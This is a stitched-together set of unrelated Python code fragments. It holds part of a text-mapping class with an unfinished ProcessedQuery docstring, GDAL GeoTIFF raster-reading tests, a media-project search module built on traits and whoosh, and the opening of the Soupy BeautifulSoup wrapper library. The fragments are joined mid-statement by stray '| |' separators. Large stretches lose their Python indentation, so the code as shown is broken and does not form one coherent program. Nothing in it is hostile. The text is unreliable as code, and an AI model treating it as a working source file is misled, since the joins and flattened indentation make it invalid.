            raise ValueError("'{}' form cannot be unprocessed".format(TEXT_FORM_RAW))
        mapping_key = (form_in, (form_in - 1))
        try:
            mapping = self._char_maps[mapping_key]
        except KeyError:
            # mapping doesn't exist -> use identity
            return index
        # None for mapping means 1-1 mapping
        try:
            return mapping[index] if mapping else index
        except KeyError:
            raise ValueError("Invalid index {}".format(index))

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return self.__dict__ == other.__dict__
        return NotImplemented

    def __ne__(self, other):
        if isinstance(other, self.__class__):
            return not self.__eq__(other)
        return NotImplemented

    def __repr__(self):
        return "<{} {!r}>".format(self.__class__.__name__, self.text)
class ProcessedQuery:
"""A processed query contains a query and the additional metadata that has been labeled or
predicted.
Attributes:
query (Query): The underlying query object.
domain (str): The domain of the query
entities (list): A list of entities present in this query
intent (str): The intent of the query
is_gold | |
= ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize)
ref_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize)
ref_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)])
ref_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
ref_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
ref_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float)
ref_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size)
if nbands == 3:
ref_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size)
if truncated:
gdal.PopErrorHandler()
ds = None
if truncated:
gdal.PushErrorHandler()
old_val = gdal.GetConfigOption(option)
gdal.SetConfigOption(option, 'YES')
ds = gdal.Open(filename)
band_interleaved = ds.GetMetadataItem('INTERLEAVE', 'IMAGE_STRUCTURE') == 'BAND'
got_data_native_type = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize)
got_data_native_type_whole = ds.GetRasterBand(1).ReadRaster()
got_data_native_type_downsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2))
got_data_native_type_downsampled_not_nearest = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear)
got_data_native_type_upsampled = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=nbands * xsize, buf_ysize=nbands * ysize)
got_data_native_type_custom_spacings = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size)
got_data_float32 = ds.GetRasterBand(1).ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
got_nbands_data_native_type = ds.ReadRaster(xoff, yoff, xsize, ysize)
got_nbands_data_native_type_whole = ds.ReadRaster()
got_nbands_data_native_type_bottom_right_downsampled = ds.ReadRaster(ds.RasterXSize - 2, ds.RasterYSize - 1, 2, 1, buf_xsize=1, buf_ysize=1, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_downsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2))
got_nbands_data_native_type_downsampled_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_downsampled_not_nearest = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=int(ysize / 2), resample_alg=gdal.GRIORA_Bilinear)
got_nbands_data_native_type_upsampled = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=4 * xsize, buf_ysize=4 * ysize)
got_nbands_data_native_type_downsampled_x_upsampled_y = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_xsize=int(xsize / 2), buf_ysize=32 * ysize)
got_nbands_data_native_type_unordered_list = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[nbands - i for i in range(nbands)])
got_nbands_data_native_type_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_native_type_pixel_interleaved_whole = ds.ReadRaster(buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space = ds.ReadRaster(xoff, yoff, xsize, ysize, band_list=[i + 1 for i in range(nbands - 1)], buf_pixel_space=nbands * dt_size, buf_band_space=dt_size)
got_nbands_data_float32 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32)
got_nbands_data_float32_pixel_interleaved = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_type=gdal.GDT_Float32, buf_pixel_space=nbands * sizeof_float, buf_band_space=1 * sizeof_float)
got_nbands_data_native_type_custom_spacings = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=2 * nbands * dt_size, buf_band_space=dt_size)
if nbands == 3:
got_nbands_data_native_type_custom_spacings_2 = ds.ReadRaster(xoff, yoff, xsize, ysize, buf_pixel_space=4 * dt_size, buf_band_space=dt_size)
ds = None
gdal.SetConfigOption(option, old_val)
if truncated:
gdal.PopErrorHandler()
gdal.Unlink(filename)
if ref_data_native_type != got_data_native_type:
print(option)
pytest.fail(i)
if truncated and not band_interleaved:
if got_data_native_type_whole is not None:
print(truncated)
print(band_interleaved)
print(option)
print(i)
pytest.fail(gdal.GetDataTypeName(dt))
elif ref_data_native_type_whole != got_data_native_type_whole:
print(i)
pytest.fail(option)
if ref_data_native_type_downsampled != got_data_native_type_downsampled:
print(option)
pytest.fail(i)
if not truncated and ref_data_native_type_downsampled_not_nearest != got_data_native_type_downsampled_not_nearest:
print(band_interleaved)
print(option)
pytest.fail(i)
if ref_data_native_type_upsampled != got_data_native_type_upsampled:
print(option)
pytest.fail(i)
for y in range(ysize):
for x in range(xsize):
for k in range(dt_size):
if ref_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k] != got_data_native_type_custom_spacings[(y * xsize + x) * nbands * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if not truncated:
for band in range(nbands):
if ref_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings[(y * xsize + x) * 2 * nbands * dt_size + band * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if nbands == 3:
for band in range(nbands):
if ref_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k] != got_nbands_data_native_type_custom_spacings_2[(y * xsize + x) * 4 * dt_size + band * dt_size + k]:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if ref_data_float32 != got_data_float32:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if not truncated and ref_nbands_data_native_type != got_nbands_data_native_type:
print(band_interleaved)
print(option)
pytest.fail(i)
if truncated:
if got_nbands_data_native_type_whole is not None:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
elif ref_nbands_data_native_type_whole != got_nbands_data_native_type_whole:
print(option)
print(i)
pytest.fail(gdal.GetDataTypeName(dt))
if truncated:
if got_nbands_data_native_type_pixel_interleaved_whole is not None:
print(option)
pytest.fail(i)
elif ref_nbands_data_native_type_pixel_interleaved_whole != got_nbands_data_native_type_pixel_interleaved_whole:
print(i)
pytest.fail(option)
if truncated and got_nbands_data_native_type_bottom_right_downsampled is not None:
print(gdal.GetDataTypeName(dt))
print(option)
pytest.fail(i)
if truncated:
continue
if ref_nbands_data_native_type_downsampled != got_nbands_data_native_type_downsampled:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_interleaved != got_nbands_data_native_type_downsampled_interleaved:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_not_nearest != got_nbands_data_native_type_downsampled_not_nearest:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_upsampled != got_nbands_data_native_type_upsampled:
print(option)
# import struct
# f1 = open('out1.txt', 'wb')
# f2 = open('out2.txt', 'wb')
# for b in range(nbands):
# for y in range(4 * ysize):
# f1.write('%s\n' % str(struct.unpack('B' * 4 * xsize, ref_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize])))
# f2.write('%s\n' % str(struct.unpack('B' * 4 * xsize, got_nbands_data_native_type_upsampled[(b * 4 * ysize + y) * 4 * xsize : (b * 4 * ysize + y + 1) * 4 * xsize])))
pytest.fail(i)
if ref_nbands_data_native_type_downsampled_x_upsampled_y != got_nbands_data_native_type_downsampled_x_upsampled_y:
print(option)
# import struct
# f1 = open('out1.txt', 'wb')
# f2 = open('out2.txt', 'wb')
# for b in range(nbands):
# for y in range(32 * ysize):
# f1.write('%s\n' % str(struct.unpack('B' * int(xsize/2), ref_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)])))
# f2.write('%s\n' % str(struct.unpack('B' * int(xsize/2), got_nbands_data_native_type_downsampled_x_upsampled_y[(b * 32 * ysize + y) * int(xsize/2) : (b * 32 * ysize + y + 1) * int(xsize/2)])))
pytest.fail(i)
if ref_nbands_data_native_type_unordered_list != got_nbands_data_native_type_unordered_list:
print(option)
pytest.fail(i)
if ref_nbands_data_native_type_pixel_interleaved != got_nbands_data_native_type_pixel_interleaved:
print(option)
pytest.fail(i)
for y in range(ysize):
for x in range(xsize):
for b in range(nbands - 1):
for k in range(dt_size):
if ref_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k] != got_nbands_m_1_data_native_type_pixel_interleaved_with_extra_space[((y * xsize + x) * nbands + b) * dt_size + k]:
print(option)
pytest.fail(i)
if ref_nbands_data_float32 != got_nbands_data_float32:
print(option)
pytest.fail(i)
if ref_nbands_data_float32_pixel_interleaved != got_nbands_data_float32_pixel_interleaved:
print(option)
pytest.fail(i)
ds = gdal.Open('data/byte.tif') # any GTiff file will do
unreached = ds.GetMetadataItem('UNREACHED_VIRTUALMEMIO_CODE_PATH', '_DEBUG_')
ds = None
if unreached:
print('unreached = %s' % unreached)
pytest.fail('missing code coverage in VirtualMemIO()')
###############################################################################
# Check read Digital Globe metadata IMD & RPB format
def test_tiff_read_md1():
    """Check reading of Digital Globe metadata in IMD & RPB format."""
    # Start from a clean slate: no PAM side-car file.
    try:
        os.remove('data/md_dg.tif.aux.xml')
    except OSError:
        pass
    ds = gdal.Open('data/md_dg.tif', gdal.GA_ReadOnly)
    filelist = ds.GetFileList()
    assert len(filelist) == 3, 'did not get expected file list.'
    metadata = ds.GetMetadataDomainList()
    assert len(metadata) == 6, 'did not get expected metadata list.'
    md = ds.GetMetadata('IMAGERY')
    for key in ('SATELLITEID', 'CLOUDCOVER', 'ACQUISITIONDATETIME'):
        assert key in md, '%s not present in IMAGERY Domain' % key
    # The acquisition time must be reported as a UTC timestamp.
    assert md['ACQUISITIONDATETIME'] == '2010-04-01 12:00:00', \
        'bad value for IMAGERY[ACQUISITIONDATETIME]'
    ds = None
    # Reading the metadata must not have created a PAM side-car file.
    assert not os.path.exists('data/md_dg.tif.aux.xml')
###############################################################################
# Check read Digital Globe metadata XML format
def test_tiff_read_md2():
    """Check reading of Digital Globe metadata in XML format."""
    # Start from a clean slate: no PAM side-car file.
    try:
        os.remove('data/md_dg_2.tif.aux.xml')
    except OSError:
        pass
    ds = gdal.Open('data/md_dg_2.tif', gdal.GA_ReadOnly)
    filelist = ds.GetFileList()
    assert len(filelist) == 2, 'did not get expected file list.'
    metadata = ds.GetMetadataDomainList()
    assert len(metadata) == 6, 'did not get expected metadata list.'
    md = ds.GetMetadata('IMAGERY')
    for key in ('SATELLITEID', 'CLOUDCOVER', 'ACQUISITIONDATETIME'):
        assert key in md, '%s not present in IMAGERY Domain' % key
    # The acquisition time must be reported as a UTC timestamp.
    assert md['ACQUISITIONDATETIME'] == '2011-05-01 13:00:00', \
        'bad value for IMAGERY[ACQUISITIONDATETIME]'
    ds = None
    # Reading the metadata must not have created a PAM side-car file.
    assert not os.path.exists('data/md_dg_2.tif.aux.xml')
###############################################################################
# Check read GeoEye metadata format
def test_tiff_read_md3():
    """Check reading of GeoEye metadata format."""
    # Start from a clean slate: no PAM side-car file.
    try:
        os.remove('data/md_ge_rgb_0010000.tif.aux.xml')
    except OSError:
        pass
    ds = gdal.Open('data/md_ge_rgb_0010000.tif', gdal.GA_ReadOnly)
    filelist = ds.GetFileList()
    assert len(filelist) == 3, 'did not get expected file list.'
    metadata = ds.GetMetadataDomainList()
    assert len(metadata) == 6, 'did not get expected metadata list.'
    md = ds.GetMetadata('IMAGERY')
    for key in ('SATELLITEID', 'CLOUDCOVER', 'ACQUISITIONDATETIME'):
        assert key in md, '%s not present in IMAGERY Domain' % key
    # The acquisition time must be reported as a UTC timestamp.
    assert md['ACQUISITIONDATETIME'] == '2012-06-01 14:00:00', \
        'bad value for IMAGERY[ACQUISITIONDATETIME]'
    ds = None
    # Reading the metadata must not have created a PAM side-car file.
    assert not os.path.exists('data/md_ge_rgb_0010000.tif.aux.xml')
###############################################################################
# Check read OrbView metadata format
def test_tiff_read_md4():
try:
os.remove('data/md_ov.tif.aux.xml')
except OSError:
pass
ds = gdal.Open('data/md_ov.tif', gdal.GA_ReadOnly)
filelist = ds.GetFileList()
assert len(filelist) == 3, 'did not get expected file list.'
metadata = ds.GetMetadataDomainList()
assert len(metadata) == 6, 'did not get expected metadata list.'
md = ds.GetMetadata('IMAGERY')
assert 'SATELLITEID' in md, 'SATELLITEID not present | |
import datetime
import io
import json_tricks
import logging
import os
from os.path import (abspath, basename, dirname, exists, expanduser,
join, realpath, relpath, splitext)
import re
import shutil
import sys
from traits.api import (Any, Dict, Enum, HasTraits, Instance, List, Long,
Str)
from whoosh import fields, qparser, query
from whoosh.util.times import datetime_to_long, long_to_datetime
from .common import get_project_dir
from .media import Media, MediaData, get_media_data
from .directory import Directory
from . import processor
logger = logging.getLogger(__name__)
# Python 2/3 compatibility: alias the text types and pick a csv module that
# handles unicode (the stdlib csv does on py3; backports.csv on py2).
if sys.version_info[0] > 2:
    unicode = str
    string_types = (str,)
    import csv
else:
    string_types = (basestring,)
    import backports.csv as csv

# Whoosh numeric field singletons, used to decode query byte values back
# into ints/floats (see _cleanup_query).
INT = fields.NUMERIC(numtype=int)
FLOAT = fields.NUMERIC(numtype=float)
def get_file_saved_time(path):
    """Return the file's ctime as a human-readable string (``ctime`` format)."""
    stamp = os.stat(path).st_ctime
    return datetime.datetime.fromtimestamp(stamp).ctime()
def _get_sample(fname):
sample = ''
with io.open(fname, 'r', newline='', encoding='utf-8') as fp:
sample += fp.readline() + fp.readline()
return sample
def _get_csv_headers(fname):
    """Sniff *fname* and return ``(has_header, header_row, dialect)``."""
    sample = _get_sample(fname)
    sniffer = csv.Sniffer()
    dialect = sniffer.sniff(sample)
    with io.open(fname, 'r', newline='', encoding='utf-8') as fp:
        header = next(csv.reader(fp, dialect))
    return sniffer.has_header(sample), header, dialect
class TagInfo(HasTraits):
    """Description of a single user-defined tag: its name, type and default."""

    # Tag name, used as the search field name.
    name = Str

    # Storage/search type of the tag's values.
    type = Enum("string", "text", "int", "float", "bool")

    # Default value assigned when the tag is added to existing media.
    default = Any

    def __repr__(self):
        return 'TagInfo(%r, %r)' % (self.name, self.type)

    def _default_default(self):
        """Trait default for ``default``, keyed on the tag's type."""
        # Renamed from `map`, which shadowed the builtin.
        defaults = {"string": "", "text": "", "int": 0, "float": 0.0,
                    "bool": False}
        return defaults[self.type]
def open_file(fname_or_file, mode='rb'):
    """Return a file-like object: anything with a ``read`` method is passed
    through unchanged, otherwise the named file is opened in *mode*."""
    if hasattr(fname_or_file, 'read'):
        return fname_or_file
    return open(fname_or_file, mode)
def sanitize_name(name):
    """Lower-case *name*, collapse whitespace runs into ``_`` and strip any
    remaining non-word characters."""
    underscored = re.sub(r'\s+', '_', name.lower())
    return re.sub(r'\W+', '', underscored)
def get_non_existing_filename(fname):
    """Return *fname* unchanged if it does not exist, otherwise a sibling
    name with ``_a`` appended to the stem."""
    if not exists(fname):
        return fname
    base, ext = splitext(basename(fname))
    return join(dirname(fname), base + '_a' + ext)
# Metadata tags automatically attached to every media file, mapping the tag
# name to its type string (see TagInfo.type).
COMMON_TAGS = dict(
    file_name='string', path='string', relpath='string',
    ctime='string', mtime='string', size='int', type='string'
)
def _cleanup_query(q, tag_types):
    """Normalize a parsed whoosh query *q* in place: decode numeric terms
    from their byte encoding and lower-case textual terms and phrases."""
    converters = dict(float=FLOAT.from_bytes, int=INT.from_bytes)
    for term in q.leaves():
        if isinstance(term, query.Term):
            if isinstance(term.text, (str, unicode, bytes)):
                kind = tag_types[term.fieldname]
                if kind in converters:
                    term.text = converters[kind](term.text)
                else:
                    term.text = term.text.lower()
        elif isinstance(term, query.Phrase):
            term.words = [word.lower() for word in term.words]
def _check_value(value, expr):
    """String query terms match by lower-cased substring; any other term
    must compare equal to the stored value."""
    if isinstance(expr, string_types):
        return expr in value.lower()
    return expr == value
def _check_range(x, term):
result = True
if term.start is not None:
if term.startexcl:
result &= x > term.start
else:
result &= x >= term.start
if term.end is not None and result:
if term.endexcl:
result &= x < term.end
else:
result &= x <= term.end
return result
def _check_date_range(x, term):
result = True
if term.startdate is not None:
result &= x >= term.start
if term.enddate is not None and result:
result &= x <= term.end
return result
def _search_media(expr, m_key, get_tag):
    """Given search expression, index to media, and a getter to get the
    attribute, check if the media matches the expression.
    """
    if not expr.is_leaf():
        # Composite query: combine children with short-circuit evaluation.
        if isinstance(expr, query.And):
            return all(_search_media(c, m_key, get_tag)
                       for c in expr.children())
        elif isinstance(expr, query.Or):
            return any(_search_media(c, m_key, get_tag)
                       for c in expr.children())
        elif isinstance(expr, query.Not):
            subquery = list(expr.children())[0]
            return not _search_media(subquery, m_key, get_tag)
        else:
            print("Unsupported term: %r" % expr)
            return False
    # Leaf terms.  NOTE: DateRange is tested before NumericRange on purpose;
    # keep this order.
    if isinstance(expr, query.Term):
        return _check_value(get_tag(m_key, expr.fieldname), expr.text)
    elif isinstance(expr, query.Phrase):
        phrase = " ".join(expr.words)
        return _check_value(get_tag(m_key, expr.fieldname), phrase)
    elif isinstance(expr, query.DateRange):
        # ctime/mtime have parallel long-encoded columns suffixed with '_'.
        if expr.fieldname == 'ctime':
            value = get_tag(m_key, 'ctime_')
        elif expr.fieldname == 'mtime':
            value = get_tag(m_key, 'mtime_')
        return _check_date_range(value, expr)
    elif isinstance(expr, query.NumericRange):
        return _check_range(get_tag(m_key, expr.fieldname), expr)
    else:
        print("Unsupported term: %r" % expr)
        return False
class Project(HasTraits):
    """A project: an indexed collection of media files under a root
    directory, with user-defined tags and whoosh-backed search."""

    name = Str
    description = Str
    path = Str
    root = Instance(Directory)
    tags = List(TagInfo)

    # Cache of Media objects handed out via get(), keyed by relative path.
    _media = Dict(Str, Media)

    extensions = List(Str)
    processors = List(processor.FactoryBase)
    number_of_files = Long

    # Path where the project data is saved.
    save_file = Str
    last_save_time = Str

    # Columnar stores: fixed metadata columns and tag columns, each mapping
    # a column name to a list indexed by row number.
    _data = Dict
    _tag_data = Dict

    # Maps a media file's relative path to its row index in the columns.
    _relpath2index = Dict()

    _query_parser = Instance(qparser.QueryParser)
def add_tags(self, tags):
tags = list(self.tags) + tags
self.update_tags(tags)
    def update_tags(self, new_tags):
        """Replace the project's tags with *new_tags* and reconcile stored
        tag data.

        A tag whose type changed is treated as removed-then-added, which
        resets its stored values to the new type's default.
        """
        old_tags = self.tags
        new_tag_names = set(tag.name for tag in new_tags)
        tag_info = dict((tag.name, tag.type) for tag in old_tags)
        removed = []
        added = []
        for tag in new_tags:
            if tag.name not in tag_info:
                added.append(tag)
            elif tag_info[tag.name] != tag.type:
                # Type change: drop the old column and start a fresh one.
                removed.append(tag)
                added.append(tag)
        for tag in old_tags:
            if tag.name not in new_tag_names:
                removed.append(tag)
        for tag in removed:
            del self._tag_data[tag.name]
        n_entries = len(self._relpath2index)
        for tag in added:
            # New columns are filled with the tag's default for every row.
            self._tag_data[tag.name] = [tag.default]*n_entries
        # The above can be the first time when self._tag_data is accessed, when
        # creating a new project for example. In this case,
        # self.__tag_data_default is called, so if self.tags is set then the
        # removed tags will not exist in _tag_data causing an error. So we only
        # set self.tags below.
        self.tags = new_tags
        # Update the cached media
        for m in self._media.values():
            for tag in removed:
                del m.tags[tag.name]
            for tag in added:
                m.tags[tag.name] = tag.default
        self._query_parser = self._make_query_parser()
def copy(self):
"""Make a copy of this project. This does not copy the data but only
the tags, extensions and the other settings of the project.
This will not copy any of the processor states but only their settings.
"""
name = self.name + ' copy'
p = Project(name=name)
traits = ['description', 'extensions', 'path', 'processors', 'tags']
p.copy_traits(self, traits, copy='deep')
# Clear out the _done information from the processors
for proc in p.processors:
proc._done.clear()
return p
# #### CRUD interface to the data ####
def update(self, media_data, tags=None):
"""Create/update the internal data given the media data and tags.
Parameters
----------
f: vixen.directory.File instance
tags: dict
"""
relpath = media_data.relpath
if not self.has_media(relpath):
index = len(self._relpath2index)
self._relpath2index[relpath] = index
for key in MediaData._fields:
self._data[key].append(None)
for tag in self.tags:
self._tag_data[tag.name].append(tag.default)
index = self._relpath2index[relpath]
for i, key in enumerate(MediaData._fields):
self._data[key][index] = media_data[i]
if tags:
for key, value in tags.items():
self._tag_data[key][index] = value
media = self._media.get(relpath)
if media is not None:
media.update(media_data, tags)
def get(self, relpath):
"""Given the relative path of some media, return a Media instance.
"""
if relpath in self._media:
return self._media[relpath]
else:
data = {}
index = self._relpath2index[relpath]
for key in MediaData._fields:
data[key] = self._data[key][index]
tags = {}
for key in self._tag_data:
tags[key] = self._tag_data[key][index]
media = Media.from_data(MediaData(**data), tags)
media.on_trait_change(self._media_tag_handler, 'tags_items')
self._media[relpath] = media
return media
def remove(self, relpaths):
"""Given a list of relative path of some media, remove them from the
database.
"""
relpath2index = self._relpath2index
indices = [(x, relpath2index[x]) for x in relpaths]
for relpath, index in sorted(indices, reverse=True):
last = len(relpath2index) - 1
if index == last:
self._delete_record(last, relpath)
else:
self._replace_with_last_record(index, last)
self._delete_record(last, relpath)
    def has_media(self, relpath):
        """Returns True if the media data is available.
        """
        # Membership in the relpath -> row-index map is the single source of
        # truth for which files the project knows about.
        return relpath in self._relpath2index
    def keys(self):
        """Return all the keys for the media relative paths."""
        # Note: on Python 3 this is a live dict view, not a list.
        return self._relpath2index.keys()
def _get_media_attr(self, index, attr):
"""Given an index to the media, return its value.
"""
if attr in self._data:
return self._data[attr][index]
elif attr in self._tag_data:
return self._tag_data[attr][index]
# #### End of CRUD interface to the data ####
def clean(self):
"""Scan the project and remove any dead entries.
This is useful when you remove or rename files. This does not refresh
the directory tree or set the number of files. It simply cleans up the
db of files that no longer exist.
"""
logger.info('Cleaning project: %s', self.name)
root_path = self.path
to_remove = []
relpath2index = self._relpath2index
for rpath in list(relpath2index.keys()):
fname = os.path.join(root_path, rpath)
if not os.path.exists(fname):
to_remove.append(rpath)
self.remove(to_remove)
def export_csv(self, fname, cols=None):
"""Export metadata to a csv file. If `cols` are not specified,
it writes out all the useful metadata.
Parameters
-----------
fname: str: a path to the csv file to dump.
cols: sequence: a sequence of columns to write.
"""
logger.info('Exporting CSV: %s', fname)
all_keys = ((set(MediaData._fields) | set(self._tag_data.keys()))
- set(('ctime_', 'mtime_')))
if cols is None:
cols = all_keys
cols = list(sorted(cols))
data_cols = set([x for x in cols if x in self._data])
with io.open(fname, 'w', newline='', encoding='utf-8') as of:
# Write the header.
writer = csv.writer(of)
writer.writerow(cols)
for i in range(len(self._relpath2index)):
line = []
for col in cols:
if col in data_cols:
elem = self._data[col][i]
else:
elem = self._tag_data[col][i]
line.append(elem)
writer.writerow(line)
def import_csv(self, fname):
"""Read tag information from given CSV filename.
Returns the success status and the error message if any. Note that this
only applies tags for column headers with known tags. Unknown tags are
not added.
Parameters
----------
fname : str Input filename.
"""
logger.info('Importing tags from: %s', fname)
has_header, | |
from __future__ import print_function, division, unicode_literals
from abc import ABCMeta, abstractproperty, abstractmethod
from collections import namedtuple
from distutils.version import LooseVersion
from functools import wraps
from itertools import takewhile, dropwhile
import operator
import re
import sys
try:
from bs4 import BeautifulSoup, PageElement, NavigableString
except ImportError: # pragma: no cover
raise ImportError("Soupy requires beautifulsoup4")
try:
import six
from six.moves import map
assert LooseVersion(six.__version__) >= LooseVersion('1.9')
except(ImportError, AssertionError): # pragma: no cover
raise ImportError("Soupy requires six version 1.9 or later")
__version__ = '0.4.dev'
# Public API of the module.
__all__ = ['Soupy', 'Q', 'Node', 'Scalar', 'Collection',
           'Null', 'NullNode', 'NullCollection',
           'either', 'NullValueError', 'QDebug']
# extract the thing inside string reprs (eg u'abc' -> abc)
QUOTED_STR = re.compile("^[ub]?['\"](.*?)['\"]$")
QDebug = namedtuple('QDebug', ('expr', 'inner_expr', 'val', 'inner_val'))
"""Namedtuple that holds information about a failed expression evaluation."""
@six.add_metaclass(ABCMeta)
class Wrapper(object):
    """
    Abstract base class for all wrappers (nodes, scalars and their null
    counterparts).  Defines the common query interface.
    """

    @abstractmethod
    def val(self):
        """Return the wrapped value (raises on null wrappers)."""
        pass  # pragma: no cover

    @abstractmethod
    def orelse(self, value):
        """Provide a fallback value for failed matches."""
        pass  # pragma: no cover

    def nonnull(self):
        """
        Require that a node is not null
        Null values will raise NullValueError, whereas nonnull
        values return self.
        useful for being strict about portions of queries.
        Examples:
            node.find('a').nonnull().find('b').orelse(3)
        This will raise an error if find('a') doesn't match,
        but provides a fallback if find('b') doesn't match.
        """
        return self

    @abstractmethod
    def isnull(self):
        """Return a Scalar(bool) indicating whether this wrapper is null."""
        pass  # pragma: no cover

    @abstractmethod
    def map(self, func):
        """Apply *func* to the wrapped value and wrap the result."""
        pass  # pragma: no cover

    @abstractmethod
    def apply(self, func):
        """Apply *func* to the wrapper itself and wrap the result."""
        pass  # pragma: no cover

    @classmethod
    def wrap(cls, value):
        """
        Wrap value in the appropriate wrapper class,
        based upon its type.
        """
        if isinstance(value, Wrapper):
            return value
        # Anything BeautifulSoup-like (exposes .children) becomes a Node.
        if hasattr(value, 'children'):
            return Node(value)
        return Scalar(value)

    def __getitem__(self, key):
        # Delegate indexing to the wrapped value via map().
        return self.map(operator.itemgetter(key))

    def dump(self, *args, **kwargs):
        """
        Extract derived values into a Scalar(tuple) or Scalar(dict)
        The keyword names passed to this function become keys in
        the resulting dictionary, while positional arguments passed to
        this function become elements in the resulting tuple.
        The positional arguments and keyword values are functions that
        are called on this Node.
        Notes:
            - The input functions are called on the Node, **not** the
              underlying BeautifulSoup element
            - If the function returns a wrapper, it will be unwrapped
            - Only either positional arguments or keyword arguments may
              be passed, not both.
        Example:
            >>> soup = Soupy("<b>hi</b>").find('b')
            >>> data = soup.dump(name=Q.name, text=Q.text).val()
            >>> data == {'text': 'hi', 'name': 'b'}
            True
            >> name, text = soup.dump(Q.name, Q.text).val()
            >> (name, text) == ('b', 'hi')
            True
        """
        if args and kwargs:
            raise ValueError('Cannot pass both arguments and keywords to dump')
        if args:
            result = tuple(_unwrap(self.apply(func)) for func in args)
        else:
            result = dict((name, _unwrap(self.apply(func)))
                          for name, func in kwargs.items())
        return Wrapper.wrap(result)

    @abstractmethod
    def require(self, func, msg='Requirement Violated'):
        """Assert that ``self.apply(func)`` is truthy, else raise."""
        pass  # pragma: no cover
class NullValueError(ValueError):
    """
    Raised when attempting to extract a concrete value from a null
    wrapper (e.g. ``Null().val()``), or when a requirement fails.
    """
    pass
class QKeyError(KeyError):
    """
    A custom KeyError subclass that better formats
    exception messages raised inside expressions
    """
    def __str__(self):
        # The message is built as "<context>\n\n\t<expression>"; re-repr and
        # de-quote the expression part so it displays cleanly.
        parts = self.args[0].split('\n\n\t')
        return parts[0] + '\n\n\t' + _dequote(repr(parts[1]))

# Masquerade as a plain KeyError in tracebacks while keeping the custom
# message formatting above.
QKeyError.__name__ = str('KeyError')
@six.python_2_unicode_compatible
class BaseNull(Wrapper):
    """
    Base class for the null wrappers, returned whenever an operation has no
    well-defined result.  Nulls absorb further operations and only fail when
    a concrete value is finally demanded.
    """
    def val(self):
        """
        Raise :class:`NullValueError`
        """
        raise NullValueError()

    def orelse(self, value):
        """
        Wrap *value* and return it, replacing this null.
        """
        return Wrapper.wrap(value)

    def map(self, func):
        """A null maps to itself; *func* is never called."""
        return self

    def apply(self, func):
        """A null applies to itself; *func* is never called."""
        return self

    def nonnull(self):
        """Raise :class:`NullValueError` -- a null is, by definition, null."""
